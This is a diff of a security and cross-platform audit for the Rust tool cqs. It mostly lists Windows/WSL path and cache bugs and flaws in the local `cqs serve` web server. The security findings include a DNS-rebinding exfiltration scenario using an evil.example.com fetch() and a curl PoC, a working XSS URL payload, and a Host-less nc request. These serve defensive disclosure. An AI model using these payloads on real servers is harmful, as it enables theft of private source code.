-- **Suggested fix:** Use the project-relative, forward-slash form consistently. Use `cqs::normalize_path(file)` (or the already-computed `rel_path` from the caller's loop) rather than `file.display().to_string()`. Re-verify with `RUST_LOG=debug` after fix on a Windows/WSL+DrvFS test path.
+- **Location:** src/cache.rs:80-84, 1399-1403; src/cli/batch/commands.rs:373-376
+- **Description:** Three paths hardcode `dirs::home_dir().join(".cache/cqs/...")`. On Windows this materializes as `C:\Users\X\.cache\cqs\embeddings.db` / `query_cache.db` / `query_log.jsonl`. The native conventions place caches under `%LOCALAPPDATA%\cqs\` (which `dirs::cache_dir()` returns). This is the same defect class as triaged PB-V1.29-8 (HF cache), but PB-V1.29-8 covers HF only; embedding/query caches and the daemon query-log are independent code paths still using the hardcoded layout. Result: Windows users get a hidden `.cache` folder in their home dir that backup tools / antivirus scans don't expect, and dual cqs installs can't share caches with HF tooling that does honor `%LOCALAPPDATA%`.
+- **Suggested fix:** Use `dirs::cache_dir().unwrap_or_else(|| dirs::home_dir().join(".cache")).join("cqs")` for all three paths, mirroring `aux_model::hf_cache_dir`'s fallback chain.
 
-#### PB-V1.29-3: `chunk.id` prefix-strip uses `abs_path.display()` — breaks on Windows verbatim + backslash paths
+#### `dispatch_drift` JSON `file` field is normalized but `dispatch_diff` JSON file fields are not (PB-V1.29-5 partial dupe — additional unfixed sites)
+- **Difficulty:** easy
+- **Location:** src/suggest.rs:101 (`dead.chunk.file.display().to_string()`), src/store/types.rs:220 (`file_display = file.display().to_string()`)
+- **Description:** PB-V1.29-5 covers `dispatch_drift`/`dispatch_diff` in `cli/batch/handlers/misc.rs`. There are at least two more sites that emit Windows backslashes the same way and aren't on the triage list: `suggest::dead_code` returns `Suggestion.file` via `dead.chunk.file.display().to_string()` (rendered into JSON), and `store::types` uses `file_display` for log messages tied to type-edge upserts. Both leak `\` separators into agent-visible output on Windows.
+- **Suggested fix:** Replace `.display().to_string()` with `crate::normalize_path(...)` in both sites; add a clippy lint or a doc-tested helper to make the convention discoverable.
+
+#### `serve::open_browser` on Windows passes URL to `explorer.exe` — drops query string / token
 - **Difficulty:** medium
-- **Location:** `src/cli/watch.rs:2432-2434`
-- **Description:**
-  ```rust
-  if let Some(rest) = chunk.id.strip_prefix(&abs_path.display().to_string()) {
-      chunk.id = format!("{}{}", rel_path.display(), rest);
-  }
-  ```
-  `chunk.id` format is `{path}:{line_start}:{content_hash}` where `{path}` is assigned during parsing. If the parser produced a forward-slash id (matching the rest of the codebase's normalization), `strip_prefix(abs_path.display())` fails on Windows (where display emits backslashes / `\\?\` verbatim) and the id keeps the absolute path. Chunks then end up with ids that don't match the relative-path ids seen everywhere else in the index, breaking `cqs read`, `cqs context`, `cqs callers` joins — silent data integrity drift on incremental indexing. The same file full-re-indexed produces correctly-prefixed ids, so stale/fresh chunks mix.
-- **Suggested fix:** Normalize both sides through `cqs::normalize_path`:
-  ```rust
-  let abs_str = cqs::normalize_path(&abs_path);
-  if let Some(rest) = chunk.id.strip_prefix(&abs_str) {
-      chunk.id = format!("{}{}", cqs::normalize_path(&rel_path), rest);
-  }
-  ```
-  Add a regression test that covers `chunk.id` containing backslashes + `\\?\` prefix.
+- **Location:** src/cli/commands/serve.rs:89-104
+- **Description:** `cmd_serve --open` invokes `explorer.exe <url>` on Windows. `explorer.exe` does not interpret a URL argument as a navigation target the way `xdg-open`/`open` do — it tries to open the URL as a path, frequently noops or pops a "Windows can't find" dialog, and on success may strip the `?token=...` query string when handed off to the default browser through DDE. With #1096 auth on by default the token is mandatory; users on Windows lose the one-click experience documented at line 67-82. The other two arms (`xdg-open`, `open`) correctly forward.
+- **Suggested fix:** Use `cmd /C start "" "<url>"` on Windows (the empty title is required so `start` parses the URL as the target, not the title). Alternative: use the `opener` crate which already encodes this behavior across platforms.
 
-#### PB-V1.29-4: `init` writes `.gitignore` with LF-only, breaks `git status` on Windows `core.autocrlf=true`
+#### `find_ld_library_dir` splits on `:` — incorrect on Windows / wrong env var name
 - **Difficulty:** easy
-- **Location:** `src/cli/commands/infra/init.rs:36-40`
-- **Description:** Finding PB-V1.25-8 from the v1.25.0 triage is still pending:
-  ```rust
-  std::fs::write(
-      &gitignore,
-      "index.db\nindex.db-wal\n...\n",
-  )
-  ```
-  On a Windows git checkout with `core.autocrlf=true` (default on Git-for-Windows), `git status` immediately shows `.cqs/.gitignore` as modified because Git re-writes it with CRLF endings. The file is not even under source control (lives in `.cqs/`) but agents running on Windows get noise in `cqs blame` / `cqs diff` on any working-tree inspection.
-- **Suggested fix:** Either (a) write platform-native line endings via `#[cfg(windows)]` replacing `"\n"` with `"\r\n"`, or (b) avoid autocrlf detection via a `.gitattributes` sibling in `.cqs/` marking `* -text`. Option (a) is the least-surprising fix.
+- **Location:** src/embedder/provider.rs:115-123
+- **Description:** `find_ld_library_dir` is `cfg(target_os = "linux")`-gated, so this is currently dormant. But the `ensure_ort_provider_libs` helper has only a Linux arm — there is no equivalent for Windows or macOS. Consequence: when ORT ships on Windows targets the only fallback for finding provider DLLs is the system loader's PATH search, with no logging of where it actually looked. Documenting the gap in the function header and adding a Windows arm that walks `PATH` (split on `;`, looking for `onnxruntime_providers_*.dll`) makes the cross-platform CUDA story explicit instead of "Linux works, others get whatever ORT happens to do."
+- **Suggested fix:** Either add `#[cfg(target_os = "windows")]` arms to `ensure_ort_provider_libs` / `find_ort_provider_dir` that walk `PATH` with `;` separator and look for `.dll`, or add a top-level doc comment stating the Windows path resolution is delegated entirely to ORT and confirming the release CI tests catch the failure mode.
 
-#### PB-V1.29-5: JSON path fields emit Windows backslashes — breaks cross-platform agent consumers
+#### `ProjectRegistry` doc claims `~/.config/cqs/projects.toml` but `dirs::config_dir()` returns macOS-specific path
 - **Difficulty:** easy
-- **Location:** `src/cli/batch/handlers/misc.rs:277,353,365,377`
-- **Description:** `dispatch_drift` + `dispatch_diff` serialize result file paths as `e.file.display().to_string()`:
-  ```rust
-  "file": e.file.display().to_string(),
-  ```
-  On Windows, this emits `src\foo.rs` in the JSON envelope. The rest of the codebase normalizes to forward slashes via `cqs::normalize_path` / `serialize_path_normalized`. An agent that reads `cqs drift --json` then uses the `file` field for a follow-up `cqs impact` / `cqs read` call will feed a backslash path into `get_chunks_by_origin` — which (per PB-V1.29-1) returns nothing.
-- **Suggested fix:** Use the existing helper. Either inline `cqs::normalize_path(&e.file)` at each site, or have the structs use `#[serde(serialize_with = "cqs::serialize_path_normalized")]` on their `PathBuf` fields.
+- **Location:** src/project.rs:1-3, 176-179
+- **Description:** Module-level doc says "Maintains a registry of indexed projects at `~/.config/cqs/projects.toml`". On macOS `dirs::config_dir()` returns `~/Library/Application Support/`, so the actual file lives at `~/Library/Application Support/cqs/projects.toml`. On Windows it lives at `%APPDATA%\cqs\projects.toml`. macOS and Windows users following the doc to find / edit the registry will look in the wrong place. The path is constructed correctly via `dirs::config_dir()` — only the doc is lying. (Per memory note `feedback_docs_lying_is_p1.md`: docs lying about a path users will run `ls`/`open` on is a P1 correctness bug, not "just docs".)
+- **Suggested fix:** Update both the module doc and the `load`/`save` doc comments to enumerate the three platform paths, e.g. "Linux: `~/.config/cqs/`, macOS: `~/Library/Application Support/cqs/`, Windows: `%APPDATA%\cqs\`". Mention `dirs::config_dir()` as the source of truth.
 
-#### PB-V1.29-6: Hardcoded `/mnt/` WSL check in `hnsw/persist.rs` + `project.rs` — ignores custom `wsl.conf automount.root`
-- **Difficulty:** easy
-- **Location:** `src/hnsw/persist.rs:86-87` + `src/project.rs:85-86` + `src/config.rs:445-451`
-- **Description:** Three independent WSL-mount checks spot-probe the default `/mnt/` prefix:
-  ```rust
-  if crate::config::is_wsl()
-      && dir.to_str().is_some_and(|p| p.starts_with("/mnt/"))
-  ```
-  WSL allows users to customize the automount root in `/etc/wsl.conf` (e.g. `root = /windows/`). Only `cli/watch.rs::is_under_wsl_automount` parses `wsl.conf` to handle this (PB-3 fix). The HNSW advisory-locking warning, project-registry locking warning, and config-permission-skip branch all silently miss non-default automount roots. On such a system the WSL file-locking advisory warning never fires and the permission-check spams warnings at users whose NTFS mount lives at `/windows/c/...`.
-- **Suggested fix:** Lift `is_under_wsl_automount` out of `cli/watch.rs` into `cqs::config` and use it in all four sites (including the existing wsl.conf parser). Alternatively, detect DrvFS specifically via `statfs` magic number (9P=0x01021997 / DrvFS has its own signature).
-
-#### PB-V1.29-7: `EmbeddingCache::open` / `QueryCache::open` propagate `set_permissions(0o700)` on WSL `/mnt/c/` — cache open can fail spuriously
-- **Difficulty:** easy
-- **Location:** `src/cache.rs:73-80, 1002-1009`
-- **Description:**
-  ```rust
-  if let Some(parent) = path.parent() {
-      std::fs::create_dir_all(parent)?;
-      #[cfg(unix)]
-      {
-          use std::os::unix::fs::PermissionsExt;
-          std::fs::set_permissions(parent, std::fs::Permissions::from_mode(0o700))?;
-      }
-  }
-  ```
-  The `?` propagates the permissions-set failure. On WSL DrvFS (`/mnt/c/`), NTFS doesn't honor POSIX mode bits — `set_permissions` returns `EINVAL` or succeeds as no-op depending on kernel/DrvFs version. If the cache file lives on `/mnt/c/` (because `dirs::home_dir()` points at a Windows HOME under WSL) the `?` kills the entire cache-open with a "permission denied" error and the binary falls back to un-cached queries (or crashes an indexing pipeline). Same pattern was already fixed in PB-V1.25-15 for the daemon socket (`.ok()` → explicit warn). Asymmetric.
-- **Suggested fix:** Downgrade to best-effort with a warn-on-failure. Mirror the pattern at `cache.rs:145-150`:
-  ```rust
-  if let Err(e) = std::fs::set_permissions(parent, ...) {
-      tracing::warn!(path = %parent.display(), error = %e,
-          "Failed to tighten cache parent dir permissions (WSL DrvFs / NTFS?); continuing");
-  }
-  ```
-
-#### PB-V1.29-8: `HF_HOME` / `HUGGINGFACE_HUB_CACHE` env lookup doesn't honor Windows `%LOCALAPPDATA%` default
+#### `index.lock` `flock` is advisory on Linux but mandatory on Windows — different failure modes for cross-tooling
 - **Difficulty:** medium
-- **Location:** `src/cli/commands/infra/doctor.rs:858-868` + `src/splade/mod.rs:957` + `src/aux_model.rs:181,188,446,528`
-- **Description:** All of these hardcode `~/.cache/huggingface/...`:
-  ```rust
-  dirs::home_dir().map(|h| h.join(".cache/huggingface/hub"))
-  ```
-  The HuggingFace SDK docs state the Windows default is `%USERPROFILE%\.cache\huggingface\hub`. This is mostly right — on Windows `dirs::home_dir()` → `%USERPROFILE%` so the joined path works *if* Windows users keep the HF defaults. However: Windows users who installed Python+transformers got `%LOCALAPPDATA%\huggingface\hub` from older `huggingface_hub` versions, and the conventional Windows cache root has always been `%LOCALAPPDATA%`. `cqs doctor --json` will display a non-existent path on Windows as the "expected HF cache", making the "Model not downloaded" diagnostic misleading.
-- **Suggested fix:** Use `dirs::cache_dir()` (which resolves correctly per-OS) joined with `huggingface/hub` as the fallback:
-  ```rust
-  if let Ok(p) = std::env::var("HF_HOME") { return PathBuf::from(p).join("hub"); }
-  if let Ok(p) = std::env::var("HUGGINGFACE_HUB_CACHE") { return PathBuf::from(p); }
-  dirs::cache_dir().map(|c| c.join("huggingface/hub"))
-      .or_else(|| dirs::home_dir().map(|h| h.join(".cache/huggingface/hub")))
-      .unwrap_or_else(|| PathBuf::from(".cache/huggingface/hub"))
-  ```
-  (still falls through to `~/.cache/huggingface/hub` for Linux/macOS/WSL where that is the documented default.)
+- **Location:** src/cli/files.rs:120-213
+- **Description:** `acquire_index_lock` uses `std::fs::File::try_lock` (introduced in Rust 1.89, MSRV 1.93+). On Linux this maps to `flock(LOCK_EX|LOCK_NB)` — purely advisory; non-cqs writers (e.g. an editor saving the DB after a crash, an external SQLite tool) will silently corrupt the index. On Windows it maps to `LockFileEx` which is mandatory and prevents *any* other process from opening the file with a conflicting share mode — including a benign `sqlite3.exe` or backup tool that opens with `FILE_SHARE_READ` but no `FILE_SHARE_WRITE`. The function-level doc covers the WSL `/mnt/c` case but does not document the Linux-vs-Windows mandatory-vs-advisory difference, and `is_wsl_drvfs_path` is not consulted before deciding to trust the lock. Result: same code, two very different concurrency contracts that callers cannot distinguish at runtime.
+- **Suggested fix:** Add a `tracing::warn!` once at startup on Windows noting that the lock is mandatory and that opening `index.db` from another process while the lock is held will fail with sharing violation. Document the Linux/Windows split in the `acquire_index_lock` doc-comment alongside the existing WSL paragraph.
 
-#### PB-V1.29-9: `aux_model::expand_tilde` only handles `~/` prefix — misses `~` alone and native Windows `%USERPROFILE%`
+#### `is_wsl_drvfs_path` only matches single-letter drive mounts — misses `wsl.localhost` and explicit-uppercase mounts
 - **Difficulty:** easy
-- **Location:** `src/aux_model.rs:101-108`
-- **Description:**
-  ```rust
-  fn expand_tilde(raw: &str) -> PathBuf {
-      if let Some(stripped) = raw.strip_prefix("~/") {
-          if let Some(home) = dirs::home_dir() { return home.join(stripped); }
-      }
-      PathBuf::from(raw)
-  }
-  ```
-  A user configuring `splade.model_path = "~"` (bare tilde, pointing at home) fails expansion. More importantly, Windows users using `~\Models\splade` (backslash separator) are not expanded, and `cqs-<version>/.cqs.toml` is silently treated as a literal path starting with `~\`. On the `is_path_like` check at line 124, `raw.starts_with("~/")` is also Windows-blind.
-- **Suggested fix:** Extend the check to handle `~` alone, `~/`, and `~\` (plus `$HOME` / `%USERPROFILE%` if symmetry is desired):
-  ```rust
-  fn expand_tilde(raw: &str) -> PathBuf {
-      if raw == "~" { return dirs::home_dir().unwrap_or_else(|| PathBuf::from(raw)); }
-      if let Some(rest) = raw.strip_prefix("~/").or_else(|| raw.strip_prefix(r"~\")) {
-          if let Some(home) = dirs::home_dir() { return home.join(rest); }
-      }
-      PathBuf::from(raw)
-  }
-  ```
-  Apply the same extension to `is_path_like`.
+- **Location:** src/config.rs:92-101
+- **Description:** The pattern requires exactly `/mnt/<lowercase letter>/`. WSL2 also exposes Windows drives under `//wsl.localhost/<distro>/mnt/c/...` and (when accessed from the Windows side) `\\wsl$\<distro>\mnt\c\...`. Additionally, `wsl.conf` `automount.options=case=force` allows uppercase drive letters. The `cli/watch.rs::create_watcher` code at line 1483-1489 already explicitly checks for `//wsl` and `is_under_wsl_automount`, but the *shared* helper used by config / project / hnsw doesn't, so those three sites still treat WSL DrvFS paths reached via UNC as native Linux. They'll then warn about world-readable perms (line 497-503) on a path where Linux-side perms are meaningless.
+- **Suggested fix:** Extend `is_wsl_drvfs_path` to also match `//wsl.localhost/`, `//wsl$/`, and uppercase drive letters. Test via `daemon_translate` style tests that fix `WSL_DISTRO_NAME`.
 
-#### PB-V1.29-10: WSL detection via `/proc/version` — misses native Linux containers with "microsoft"/"wsl" in kernel string
+#### `git_file = rel_file.replace('\\', "/")` only normalizes one direction — Windows-origin chunk IDs slip through
+- **Difficulty:** easy
+- **Location:** src/cli/commands/io/blame.rs:113-115
+- **Description:** Comment says "PB-3: Windows compat" and the `replace('\\', "/")` covers the common case where chunk.file came from `cqs::normalize_path` (forward-slash). But `chunk.file` can also be a `PathBuf` whose components include the verbatim `\\?\` prefix when the chunk was inserted from a path that bypassed `normalize_path` (e.g. a partial / pre-DS2-1 fix path). The replace would emit `//?/C:/Projects/...` to git, which git rejects with "ambiguous argument". A symmetric strip via `crate::normalize_slashes(&rel_file)` (which calls `strip_windows_verbatim_prefix` first) is what the rest of the codebase uses.
+- **Suggested fix:** `let git_file = crate::normalize_slashes(&rel_file);` — covers both backslash conversion and `\\?\` strip in one call, matching the convention established in src/lib.rs:420.
+
+#### `daemon_socket_path` falls back to `std::env::temp_dir()` on `XDG_RUNTIME_DIR` unset — different parent-dir trust on macOS
 - **Difficulty:** medium
-- **Location:** `src/config.rs:31-47`
-- **Description:**
-  ```rust
-  pub fn is_wsl() -> bool {
-      static IS_WSL: OnceLock<bool> = OnceLock::new();
-      *IS_WSL.get_or_init(|| {
-          if std::env::var_os("WSL_DISTRO_NAME").is_some() { return true; }
-          std::fs::read_to_string("/proc/version")
-              .map(|v| v.to_lowercase().contains("microsoft") || v.contains("wsl"))
-              .unwrap_or(false)
-      })
-  }
-  ```
-  Two issues:
-  1. `v.contains("wsl")` is case-sensitive on the second predicate but `.to_lowercase()` was applied only to the first; line 42 stores `.to_lowercase()` in `lower` and checks both, so this particular bug is not active — but the test comparing raw `v` (if refactored) would silently regress.
-  2. The detection can false-positive on Linux hosts where `/proc/version` happens to mention Microsoft (e.g. Mariner Linux, some Azure images, or a custom kernel with a "Microsoft" contributor in `CONFIG_CC_VERSION_TEXT`). On those hosts `cqs` then switches to `--poll` mode and bumps debounce to 1500ms for no reason, slowing watch cycles ~3×.
-- **Suggested fix:** Also require `WSL_INTEROP` or `/run/WSL` / `/proc/sys/fs/binfmt_misc/WSLInterop` to be present. Those are set exclusively by the WSL init process. Falling back to `/proc/version` alone is the cheapest signal but should not be the only one.
+- **Location:** src/daemon_translate.rs:179-188
+- **Description:** Linux desktops set `XDG_RUNTIME_DIR=/run/user/<uid>` (mode 0700, owned by the user). When unset (headless servers, container minimal images, macOS where `XDG_RUNTIME_DIR` is not standard), the code falls back to `std::env::temp_dir()` — `/tmp` on Linux, `/var/folders/.../T` on macOS. macOS's `/var/folders/...` is per-user-and-bootstrap and reasonably private (mode 0700), but Linux `/tmp` is mode 1777. The umask wrap at watch.rs:1626 narrows the bind window, and the explicit `chmod 0o600` at watch.rs:1637 is the actual access gate. Still, the silent fallback hides a meaningful trust boundary: on a Linux multi-user system without `XDG_RUNTIME_DIR`, the socket lives in a directory where another local user can `unlink` it (or `mkfifo` over its name during the bind race). The doc comment notes the issue (line 1615-1622 SEC-D.6) but `daemon_socket_path` itself doesn't log when the fallback fires.
+- **Suggested fix:** When `XDG_RUNTIME_DIR` is unset on Linux, log `tracing::info!("XDG_RUNTIME_DIR unset — daemon socket falls back to temp_dir; consider setting XDG_RUNTIME_DIR=/run/user/$(id -u)")` once per process. On macOS the fallback is fine — gate the warning on `cfg(target_os = "linux")` so it's only emitted where `/tmp` is actually shared.
 
----
+#### NTFS mtime resolution is 100ns but Windows-side editors update mtime at 2s granularity in some configurations — `prune_last_indexed_mtime` watermark too tight
+- **Difficulty:** medium
+- **Location:** src/cli/watch.rs:551-560 (and wider mtime-keyed change-detection in `should_reindex`)
+- **Description:** `last_indexed_mtime` is a `HashMap<PathBuf, SystemTime>` and the watcher decides "skip unchanged mtime" via exact `SystemTime` equality. NTFS file timestamp resolution is documented as 100ns, but FAT32 (still mounted on USB sticks, recovery partitions, and some `/mnt/<letter>/` paths) has 2-second resolution on writes. WSL DrvFS exposes the underlying NTFS mtime, but Windows-side `notepad.exe` saves can lose sub-second precision when the underlying filesystem is FAT32. Two saves within 2s on a FAT32 mount will therefore collide on the same mtime and the watch loop will skip the second — a real correctness gap on `/mnt/d` if D: is a USB stick. There's a 1s debounce auto-bump on WSL DrvFS (line 1495-1500) that masks most of this, but the equality check against the cached mtime doesn't.
+- **Suggested fix:** When `is_wsl_drvfs_path(file)` is true, treat mtime equality with `<` instead of `==` over a 2-second buckets, OR fall back to content-hash comparison (already computed for parser ingest) when mtime equality is suspicious. Document the FAT32 caveat in the function header.
 
-## Summary
-10 findings: 8 easy + 2 medium. Most are path-normalization gaps where forward-slash DB origins meet backslash or verbatim-prefix user/system input on Windows or WSL. PB-V1.29-2 (silent SPLADE no-op on Windows watch) and PB-V1.29-3 (chunk.id drift on incremental re-index) are the highest-impact correctness issues.
+#### `serve::enforce_host_allowlist` accepts missing Host header — dev-only ergonomic leaks into production
+- **Difficulty:** easy
+- **Location:** src/serve/mod.rs:230-251
+- **Description:** Comment at lines 230-233 explains the bypass: "A missing `Host:` header passes through — HTTP/1.1 requires one and hyper always provides one on real traffic, but unit tests built via `Request::builder()` without a `.uri()` that includes a host don't get one synthesized, and we'd rather not break that ergonomic." That's a unit-test ergonomic baked into the production middleware. A non-browser HTTP/1.0 client (or HTTP/2 client that uses `:authority` but routes through a proxy that strips it) reaches the handler with no Host header, bypassing the DNS-rebinding allowlist that SEC-1 closes for browser traffic. The auth token (#1096) covers this in default config, but `--no-auth` exposes it.
+- **Suggested fix:** In production code reject missing Host with 400, and in `tests.rs` add `Host: localhost` to the `Request::builder()` fixtures (cheap one-liner). Or gate the bypass on `cfg(test)`.
 
----
 
 ## Security
 
-#### DNS-rebinding exfiltration of full source — `cqs serve` accepts any Host header
+> All eight previously-listed findings (DNS-rebinding host-allowlist,
+> XSS via `body.slice()` → `innerHTML`, IN-list / SQL-LIMIT DoS, LIKE-wildcard
+> injection in `file` and `tests-cover`, `cmd_serve` / `xdg-open` URL hazard,
+> unauthenticated serve) are already in `docs/audit-triage-v1.30.0.md` as
+> SEC-1 … SEC-8. SEC-7 (no-auth) is fixed by #1118. The findings below are
+> NEW exposures introduced by the v1.30.0 surface (auth token plumbing,
+> tracing, host-header edge cases) that the prior pass did not catch.
+
+#### Auth token leaked into tracing spans by `TraceLayer::new_for_http()`
+- **Difficulty:** easy
+- **Location:** `src/serve/mod.rs:195` (`TraceLayer::new_for_http()`), interacts with `src/serve/auth.rs:194-232` (`enforce_auth`) and `src/cli/commands/serve.rs:73-76` (token-bearing URL passed to `xdg-open`)
+- **Description:** `auth.rs` is meticulous about not leaking the token: constant-time compare, `HttpOnly; SameSite=Strict` cookie, redirect that strips `?token=` from the address bar, and an explicit comment at `auth.rs:226-228` claiming "Tracing happens once per launch (banner) and never per-request — auditors can grep for the count of 401s without seeing tokens." That contract is silently broken by `TraceLayer::new_for_http()`, which is wired as the outermost layer (`mod.rs:195`) and thus runs **before** `enforce_auth`. The default `MakeSpan` of `tower-http` 0.6's TraceLayer records `http.uri` (full path + query string) on every request span. So the very first browser navigation `GET /?token=<43 chars>` lands the token in the span at DEBUG, and any operator running with `--log-level=debug`, `RUST_LOG=tower_http=debug`, or `RUST_LOG=info,tower_http=debug` (commonly recommended for diagnosing serve issues) writes the token to journald / log files / pipes that long-outlive the per-launch token. The same applies to `xdg-open`: the URL passed to `Command::new("xdg-open")` (`serve.rs:97`) typically ends up in shell history, in xdg-open's own logging, and in the browser's session-restore database — but those are user-local and arguably the intended cost of `--open`. The TraceLayer leak is the surprise: it converts a defensible "token visible to your local browser" model into "token visible to anyone who can read your logs." Coupled with the loud-warning banner that prints the token to stdout (`mod.rs:113-116`), captured stdout in CI / systemd `StandardOutput=` ends up in journald too. Severity: medium — token rotates per-launch, so leaked tokens are bounded by uptime, but a 30-day journal retention easily covers a long-running daemon.
+- **Suggested fix:** Customize TraceLayer's `MakeSpan` to scrub the query string before recording: `TraceLayer::new_for_http().make_span_with(|req: &Request<_>| { let path = req.uri().path(); tracing::info_span!("http_request", method = %req.method(), path) })`. Alternatively, redirect-then-trace by reordering the layers so the auth redirect runs before TraceLayer sees the URI — but that swaps the ordering invariant the comment relies on, and breaks the "401 responses still get traced" guarantee. The MakeSpan override is the surgical fix.
+
+#### `enforce_host_allowlist` lets a missing-`Host:` request bypass DNS-rebinding protection
+- **Difficulty:** easy
+- **Location:** `src/serve/mod.rs:234-251` (specifically the `None => Ok(next.run(req).await)` branch at line 240)
+- **Description:** The allowlist middleware passes through when `Host:` is absent: `match req.headers().get(header::HOST) { None => Ok(next.run(req).await), … }`. The doc-comment justification at `mod.rs:230-233` is "HTTP/1.1 requires one and hyper always provides one on real traffic, but unit tests built via `Request::builder()` without a `.uri()` that includes a host don't get one synthesized, and we'd rather not break that ergonomic." This privileges test ergonomics over runtime safety. (1) HTTP/1.0 does not require Host — a hand-crafted `GET /api/chunk/<id> HTTP/1.0\r\n\r\n` from `nc 127.0.0.1 8080` reaches the handler with zero Host header and zero allowlist check. With `--no-auth` the entire DNS-rebinding protection is bypassed for that request shape. With auth, the auth layer still gates it (so the immediate damage is bounded), but the v1 spec explicitly relies on the host allowlist as defense-in-depth, and this hole quietly disables it. (2) Browsers in error states (eg. `XMLHttpRequest` against a non-standard scheme handler) have historically dropped the Host header. (3) An axum middleware quirk: the middleware sees the raw header map; some HTTP libraries emit `Host:` with empty value (`Host: \r\n`), which `.to_str().unwrap_or("")` collapses to `""`, but `to_str()` on an empty `HeaderValue` actually returns `Ok("")`, which then fails the allowlist check (good). But a request with a non-ASCII byte in Host (`Host: \xff`) fails `.to_str()` → `unwrap_or("")` → empty → rejected. So the only real escape is the literal-missing case at line 240 — which is the most exploitable variant. The "don't break test ergonomics" excuse is also questionable: tests inside the crate can call `enforce_host_allowlist_with_default_allowed` or stamp a Host header in fixtures (`Request::builder().header(HOST, "127.0.0.1:8080").uri("/foo").body(...)`), which is a one-line change in the existing test file.
+- **Suggested fix:** Reject missing-Host as a malformed request: replace `None => Ok(next.run(req).await)` with `None => Err((StatusCode::BAD_REQUEST, "missing Host header"))`. Update tests in `src/serve/tests.rs` to set a Host header explicitly — those tests are already exercising the real auth + host paths; adding a header is consistent with what hyper does on real traffic and removes a real bypass.
+
+#### `--bind 0.0.0.0` allows LAN attackers to hit the server but the host-allowlist breaks the legitimate browser path — operator footgun pushes them to `--no-auth`
 - **Difficulty:** medium
-- **Location:** `src/serve/mod.rs:97-114` (`build_router`), `src/cli/commands/serve.rs:20-34` (`cmd_serve`)
-- **Description:** `cqs serve` binds 127.0.0.1 by default but does NOT validate the inbound `Host` header and does NOT send any CORS headers. Classic DNS-rebinding attack: an attacker's web page at `evil.example.com` (TTL 0, returns `A 127.0.0.1` after the user's initial fetch) can `fetch("http://evil.example.com:8080/api/chunk/<id>")` and read the response because the attacker's origin is same-site from the browser's view, while the server sees only a 127.0.0.1 bind and answers. `/api/chunk/:id` returns 30 lines of source (`content_preview` in `data.rs:484`), `/api/search?q=` returns arbitrary name matches, `/api/graph` returns the entire call graph, `/api/embed/2d` returns every chunk with UMAP coords. An adversarial page on another tab can silently exfiltrate the whole indexed corpus. The v1 spec explicitly calls out "single-user local exploration" but the network isolation is paper-thin. PoC: `while true; do curl -s -H 'Host: evil.example.com' http://127.0.0.1:8080/api/stats; done` returns 200 — server answers regardless of Host.
-- **Suggested fix:** Add middleware that 400s any request whose `Host:` header isn't `127.0.0.1:<port>`, `localhost:<port>`, `[::1]:<port>`, or the explicit `--bind` value. Optionally tighten with `tower_http::validate_request::ValidateRequestHeaderLayer`. This defeats DNS rebinding because the attacker's DNS record flips the IP, not the host header the browser sends. Same pattern used by `jupyter`, `rust-analyzer`, etc.
+- **Location:** `src/serve/mod.rs:207-218` (`allowed_host_set`), `src/cli/commands/serve.rs:27-37` (warning gating)
+- **Description:** With `cqs serve --bind 0.0.0.0`, the allowlist ends up containing `{localhost, localhost:8080, 127.0.0.1, 127.0.0.1:8080, [::1], [::1]:8080, 0.0.0.0:8080, 0.0.0.0}`. A LAN client navigating to `http://192.168.1.5:8080/` sends `Host: 192.168.1.5:8080`, which is NOT in the allowlist → 400 "disallowed Host header". So `--bind 0.0.0.0` is effectively unusable from any non-loopback peer despite the operator having explicitly opted into LAN binding. The expected operator response is to add `--no-auth` (which doesn't help — the host check is in front of auth) or to dig into the source and discover that `--bind <actual-IP>` is the real path. Worse: the only "bind-without-auth-is-loud" warning at `serve.rs:27-37` triggers only when `bind != "127.0.0.1" && bind != "localhost" && bind != "::1"`, but treats `0.0.0.0` as non-localhost-y and fires the warning — pushing operators toward `--no-auth` to "make it work." The result is a UX that punishes the secure path (auth on + bind 0.0.0.0 → 400) and rewards the insecure path (`--no-auth` → works for LAN). Threat model: an operator legitimately needs `cqs serve` reachable from a teammate's laptop on the same VLAN, sees auth-on returns 400 on the laptop, falls back to `--no-auth`, exposes the entire indexed corpus.
+- **Suggested fix:** When `bind == 0.0.0.0` (or `::`), the host allowlist should accept any RFC-1918 / loopback / link-local Host plus the bind port. Cleaner: when binding to a wildcard, populate the allowlist from `nix::ifaddrs` / `if_addrs` so the actual interface IPs are accepted. Even simpler: when `bind_addr.ip().is_unspecified()`, skip the host-header check entirely (auth is the only gate) and emit a one-line stderr warning at startup explaining that the host-header DNS-rebinding protection is disabled in wildcard mode.
 
-#### XSS via unescaped error body in hierarchy view and cluster view
+#### Token printed to stdout is captured by systemd `journald` — long-lived servers leak their token to a 30-day-retention log
 - **Difficulty:** easy
-- **Location:** `src/serve/assets/views/hierarchy-3d.js:107` and `src/serve/assets/views/cluster-3d.js:114`
-- **Description:** Both views do `this.container.innerHTML = \`<div class="error">... ${body.slice(0, 200)}</div>\`` where `body` is `await resp.text()` from a failed `/api/hierarchy/{id}` or `/api/embed/2d` call. The failure body is JSON but the client injects it as raw HTML. The `{id}` passed to the hierarchy endpoint is reflected unescaped by the server in `ServeError::NotFound(format!("chunk: {id}"))` (`handlers.rs:219`), which lands in `detail` of the JSON body. An attacker who can make a user visit a crafted URL runs arbitrary JS in the cqs-serve origin. PoC: `http://127.0.0.1:8080/?view=hierarchy&root=%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E` → loadData() fetches `/api/hierarchy/<img src=x onerror=alert(document.domain)>`, gets 404 with `{"error":"not_found","detail":"not found: chunk: <img src=x onerror=alert(document.domain)>"}`, and that string is slotted into innerHTML. `<img>` closes cleanly inside the JSON and the `onerror` fires. Paired with the DNS-rebinding vector above, any site on the internet can run JS against a running `cqs serve` without user interaction beyond "visit the page".
-- **Suggested fix:** Either (a) always parse the body as JSON and render `escapeHtml(parsed.detail)` (consistent with the rest of app.js which uses `escapeHtml`), or (b) use `textContent` to set the error message. Easiest: mirror the pattern in `app.js:372` — `<p class="error">error: ${escapeHtml(...)}</p>`.
+- **Location:** `src/serve/mod.rs:111-117` (`println!("cqs serve listening on http://{actual}/?token={}")`)
